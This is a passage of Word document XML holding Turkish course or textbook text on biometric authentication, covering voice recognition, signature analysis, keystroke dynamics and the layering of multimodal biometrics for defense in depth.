      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metinden bağımsız sistemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Text-independent systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86F1D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, kullanıcının istediği herhangi bir kelimeyi veya ifadeyi söylemesini ister. Bu sistemler, kullanıcının konuşmasını ölçmek için sesli planları kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3AB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metin istemli sistemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3AB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Text-prompted systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3AB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, kullanıcının sistem tarafından sağlanan rasgele kelimeleri okumasını gerektirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE68A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcının sesi sistem tarafından dijitalleştirilir ve daha sonra karşılaştırmalar için bir model şablonu üretilir ve kullanılır. Ses tabanlı sistemlerde tipik tanıma süresi dört ila altı saniyedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE68A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eşleşme</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE68A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> noktaları. Sisteme konuşulan her kelime veya kelime öbeği, her biri birkaç baskın frekans içeren heceler veya fonemlerden (veya küçük fonetik birimlerden) oluşan küçük parçalara bölünür. Bu baskın frekanslar, segmentin tüm uzunluğu boyunca oldukça tutarlıdır. Sırasıyla, bu bölümlerin her biri yakalanan ve dijital bir formata dönüştürülen birkaç (üç ila beş) baskın ton içerir. Bu dijital bilgi daha sonra bir ana tabloya aktarılır. Tüm bölümler için birleşik ton tablosu, kullanıcının benzersiz sesli görüntüsünü oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3D02">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. Sesli yazı şablonları, uygulamaya ve sistem tarafından istenen ses bilgisinin kalitesine bağlı olarak büyük ölçüde değişir. Depolama boyutu, 300 - 500 bayt arasında, 5000 - 10.000 bayta kadar değişebilir. Bu, depolama veya analiz sisteminin düşük bellek veya depolama kapasitesine sahip olduğu uygulamalar için özellikle uygun değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00332C44">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Çoğu ses tanıma sistemi yüksek bir doğruluk derecesine sahiptir. En iyileri yalnızca kullanıcının sesli raporunu analiz etmekle kalmaz, aynı zamanda sesin orijinal mi yoksa mekanik bir çoğaltma mı olduğunu doğrulamak için canlılığı kontrol eder. Sistem, kullanıcı için özel bir eğitim gerektirmediğinden, kullanıcılar arasında kabul ve uygunluk memnuniyeti yüksektir. Ancak, ortam gürültüsü ve kaydın aslına uygunluğu gibi dış faktörler işlemin doğruluğunu olumsuz yönde etkileyebil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r w:rsidRPr="003327E5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İmza Analizi (Signature Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A180E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Muhtemelen tüm biyometrik işlemlerin en az tartışmalı olanı imza analizinin kullanılmasıdır. Bunun nedeni, bir imza üretme sürecinin yanı sıra bir tanesini kabul etmenin sosyal ve yasal etkilerinin neredeyse tüm modern toplumlarda iyi bir şekilde oluşturulmasıdır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A180E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Göz taramalarından veya parmak izlerinden farklı olarak, imza temelli biyometrik sistemlerin kullanımına bağlı neredeyse hiçbir sosyal damga yoktur. Güvenlik açısından, imzaların kullanımı kasıtlı bir eylemi oluşturur; asla tesadüf eseri verilmezler. Göz taramaları, parmak izleri ve DNA gibi diğer biyometrik bilgilerin tümü, kullanıcının bilgisi olmadan elde edilebilir. Buna karşılık, bir kişi kasıtlı olarak imzasını sağlamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007522F9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nasıl çalışır. Kullanıcı, adını özel bir tablete “imzalar”. Kalem vuruşlarını kaydetmek için mürekkep kullanmak yerine, tablet bir imza oluşturulmasını simüle etmek için kalem hareketini kaydetmek için özel </w:t>
      </w:r>
      <w:r w:rsidRPr="007522F9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bir sensör kullanır. İki farklı imza analizi türü vardır. İmza karşılaştırması, harf boyutu, aralık, açılar, konturlar ve eğik gibi özellikler de dahil olmak üzere imza içinde bulunan fiziksel özellikleri inceler. Ne yazık ki, imza karşılaştırma sistemlerinin kandırılması daha kolay olabilir çünkü mekanik reprodüksiyonların kullanımına ya da deneyimli ustaların el işlerine karşı hassastırlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="007522F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007522F9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buna karşılık, dinamik imza doğrulama bir adım daha ileri gider; İmza içindeki fiziksel özellikleri kontrol etmenin yanı sıra, imza oluşturma işlemini de hesaba katar. Dinamik imza doğrulama sistemleri, kişi adını imzalarken ortaya çıkan hız, zamanlama, baskı ve ivme değişikliklerini dikkate alır. Tecrübeli bir sahtekar, mağdurun imzasının görünümünü güvenilir bir şekilde yeniden yaratabiliyorsa, yalnızca bir imzanın yaratıcısı her seferinde tekrar tekrar benzer kalem vuruşları üretebilir. Bir imza biyometrik sistem için tipik doğrulama süresi dört ila altı saniyedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56BDC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanılan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> eşleşme</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56BDC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> noktaları. Kullanılan belirli eşleşme noktaları satıcıdan satıcıya değişir. En yaygın sistemler, imzanın dijitalleştirilmiş bir grafik gösterimini, ayrıca imza işlemi sırasında kaydedilen değişken kalem hareketi ve basınç bilgisini saklar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00416618">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. İmza analiz sistemlerinin çoğu yaklaşık 1500 baytlık şablonları saklar. Bazı satıcılar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (vendor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00416618">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, sıkıştırma ve optimizasyon teknikleriyle şablonun yaklaşık 200 bayta düşürülebileceğini iddia ediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B43412">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Genel olarak, imza analiz sistemleri, özellikle diğer biyometrik göstergelerle karşılaştırıldığında, yalnızca makul bir doğruluğa sahiptir. Bu belki de imza sistemlerinin üstesinden gelmesi gereken değişkenlikten kaynaklanmaktadır. Yorgunluk, hastalık, sabırsızlık ve hava durumu gibi faktörler, bir kişinin ismini herhangi bir durumda nasıl imzaladığını etkile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r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tuş Dinamiği (Keystroke Dynamics)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Potansiyel bir biyometrik sistem için en çok arzu edilen yönlerden biri, kullanıcının iş sürecini değiştirmesini istemeden kullanıcı girişi toplamak veya (en iyi durumda) biyometrikin ölçülmekte olduğunun farkında olmaktır. Bu amaçla, tuşa basma dinamiği analizinin kullanılması, son kullanıcı için mümkün olduğunca göze çarpmayan olma konusunda en yakın olanıdır. Tuş vuruş dinamiklerini ölçmek, kullanıcıları bir klavyede yazarken izlemeyi ve ayrı tuş vuruşlarının hızını, süresini, gecikmelerini, hatalarını, kuvveti ve aralıklarını ölçmeyi içerir. Çoğu bilgisayar kullanıcısı, belirli bilinen kalıpları (kullanıcı kimlikleri veya standart bir cümle gibi) tekrar edilebilecek ve ölçülebilecek bir tutarlılıkla tekrar tekrar yazabilir, böylece onu biyometrik kullanım için doğal hale getirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. Bir kullanıcı klavyeye bir parola yazar. Bu ifade, daha önce kullanıcı tarafından bilinen ve tipik olarak her kullanıcı için standart hale getirilmiş olandır. Sistem klavyeyi saniyede 1000 kez tarar ve bir şablon oluşturmak için çeşitli ölçümler kaydeder. Giriş zamanı, parolanın uzunluğuna bağlı olarak değişir ve doğrulama süresi tipik olarak beş saniyeden azdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eşleşme</w:t>
      </w:r>
      <w:r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> noktaları. Sistem, tuş vuruşlarını bir dizi digraph (iki bitişik tuş vuruşları) veya trigraph (üç bitişik tuş vuruşları) halinde ayırır. İmza / trigraftaki her bir anahtar arasındaki ilişki yakalanır ve o oturum için bir şablon oluşturmak üzere analiz edilir. Kilit zamanlamanın iki yönü </w:t>
      </w:r>
      <w:r w:rsidRPr="009037CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>özellikle önemlidir: bekleme süresi veya süre (belirli bir tuşun basılı tutulduğu süre) ve uçuş süresi veya gecikme süresi (tuşa basılanlar arasındaki süre miktarı).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F73F2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. Tuş dinamiği sistemleri için depolama gereklilikleri, kullanılan parolanın boyutuna ve digraph başına alınan ölçüm sayısına bağlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14757">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Tuşa dayalı biyometrik sistemlerin genel doğruluğu, kullanılan ölçüm yöntemine ve kullanıcıdan istenen giriş türüne bağlı olarak oldukça değişken olabilir. Kullanıcının kendi parolasını girmesine izin vermek yerine, yapılandırılmış metni (yani, sistem tarafından sağlanan parolalar) kullanan bir sistemde, yüzde 90 veya daha fazla doğruluk oranları elde edilmiştir. Bununla birlikte, kullanıcının yazma yeterliliği ve hatta farklı bir klavyenin kullanılması da dahil olmak üzere birçok faktörün doğruluğunu etkileyebil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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00400E26" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400E26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Teknolojileri Birleştirmek (Combining Technologies)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400E26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hangi biyometrik sistemin kullanılacağı seçimi, özel güvenlik ihtiyacına, belirli bir yöntemin uygulanmasının maliyetine ve uygulanabilirliğine ve önlemin nasıl kurulabildiğine ve kullanılabileceğine dayanmaktadır. Bununla birlikte, her farklı biyometrik teknolojinin sınırlamaları vardır. Yüksek güvenlikli bir ortam yaratmaya çalışırken, zamanın güvendiği bir güvenlik stratejisi kullanmak avantajlı olabilir: derinlemesine savunma. Derinlemesine savunma kavramı, potansiyel bir saldırganla potansiyel bir hedef arasına birçok katman veya engel yerleştirmektir. Her katman, katmanı ondan önce tamamlar ve geliştirir, bir saldırganın hedefe ulaşmak için birden fazla (ve zor) engel atlamasını gerektir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400E26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Derinlemesine savunma biyometriye de uygulanabilir. Bunu başarmanın bir yöntemi katman kullanımıdır. Katmanlamanın ardındaki kavram, diğer geleneksel kimlik belirleme ve onaylama biçimleriyle birlikte biyometrik teknolojiyi kullanmaktır. Örneğin, bir binaya erişmek için bir ziyaretçinin hem fotoğraflı kimlik kartı göstermesi hem de parmak izi taramasından geçmesi gerekebilir. Çünkü fotoğraflı kimlikler kusursuz değildir (holografik mühürler ve filigranlar gibi modern sahteciliğe karşı tekniklerin kullanılmasına rağmen), İşlemin doğruluğuna olan güven, karttaki kişinin ve kapıdaki kişinin aynı olduğunu doğrulamak için parmak izlerinin kullanılmasıyla arttırılmıştır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72D14">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Derinlemesine savunma sağlamanın bir başka yolu da, multimodal biyometri kullanımıdır. Çok modlu bir kurulumda, iki (veya daha fazla) biyometrik teknoloji paralel olarak kullanılır ve kullanıcının başarılı bir şekilde tanımlanması için her birini geçmesi gerekir. Örneğin, bir kullanıcının sınıflandırılmış bir alana kabul edilebilmesi için hem iris taramasını hem de ses tanımlama testini geçmesi gerekebilir. Multimodal biyometri kullanımı, birkaç avantaja sahiptir. İlk olarak, daha yüksek hata oranlarına sahip olabilecek biyometrik teknolojilerin kullanılmasına izin verir, çünkü kullanımdaki ek biyometrik kullanım herhangi bir hatayı gevşekleştirir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72D14">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Başka bir deyişle, bir biyometrik teknoloji yüzde 10'luk bir hata oranına ve diğeri yüzde 12'lik bir hata oranına sahip olabilir. Kendileri tarafından, bu oranların her biri pratik kullanım için çok yüksek olabilir. Ancak birleştirildiğinde, iki teknoloji birlikte yalnızca yüzde 1,5'lik bir hata oranına sahip olabilir. Bu potansiyel kullanıcı için çok daha kabul edilebilir olabilir. Ek olarak, çoklu biyometrelerin kullanımı herhangi bir ölçümde daha fazla çeşitliliğe izin verir. Örneğin, ses tanıma sistemleri cızırtılı seslerde (soğuk algınlığı nedeniyle) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72D14">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>zorluk yaşayabilir ve diğer biyometriler değiştirilmiş vücut özelliklerinden (örneğin yara izleri, morluklar vb.) Dolayı zorluk yaşayabilir. Çok modlu kullanım, biyometrik süreçte hala yüksek bir genel güvence seviyesini korurken, vücut özelliklerinde daha fazla çeşitlilik sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00385665" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
